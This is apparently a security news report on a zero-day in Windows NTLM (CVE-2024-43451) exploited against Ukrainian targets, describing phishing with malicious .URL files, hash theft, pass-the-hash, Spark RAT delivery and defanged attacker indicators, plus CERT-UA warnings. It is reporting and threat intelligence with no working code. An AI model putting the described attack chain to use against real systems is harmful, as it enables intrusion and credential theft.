A recently addressed security flaw in the Windows NT LAN Manager (NTLM) system has become the target of exploitation by a suspected Russia-aligned cyber threat actor, harnessed as a zero-day vulnerability in aggressive cyber incursions focused on Ukraine.
This vulnerability, identified as CVE-2024-43451 with a CVSS rating of 6.5, involves a spoofing flaw that permits unauthorized disclosure of NTLMv2 hashes. Microsoft patched this vulnerability earlier this week, though it was already in active exploitation.
Microsoft’s advisory warns that this flaw can be triggered through minimal user interaction with a malicious file—whether a simple click, a right-click, or even a non-executing action can initiate the exploit.
Israeli cybersecurity firm ClearSky discovered this zero-day flaw in June 2024, noting its use in a complex sequence of attacks culminating in the deployment of the open-source Spark RAT malware.
ClearSky elaborated that this vulnerability activates URL files, leading to unauthorized activities. Hosted on an official Ukrainian government site, these malicious files lured users under the guise of downloadable academic certificates.
The modus operandi involves phishing emails dispatched from a compromised Ukrainian government server (“doc.osvita-kp.gov[.]ua”) urging recipients to renew academic certifications. Embedded within these messages is a rigged URL that initiates the download of a ZIP archive containing a dangerous internet shortcut (.URL) file. The vulnerability is exploited when victims interact with this URL file through various actions, such as right-clicking, deleting, or moving it.
The URL file establishes a connection with a remote server (“92.42.96[.]30”) to retrieve additional payloads, including the Spark RAT malware.
ClearSky also observed a sandbox alert flagging an attempt to transmit the NTLM hash through the SMB (Server Message Block) protocol. Once this NTLM hash is intercepted, the attacker can leverage a Pass-the-Hash attack, impersonating the user linked to the compromised hash without needing the actual password.
Ukraine’s Computer Emergency Response Team (CERT-UA) attributes this activity to a likely Russian cyber threat group, designated as UAC-0194. Recently, CERT-UA cautioned against a parallel wave of phishing emails bearing tax-related hooks, used to spread legitimate remote desktop software called LiteManager. CERT-UA identifies this financially motivated campaign as orchestrated by a threat actor labeled UAC-0050.
CERT-UA has further advised that accountants working with remote banking systems are particularly vulnerable. Computer forensics have shown that, in some cases, a mere hour elapses between the initial breach and the theft of financial assets.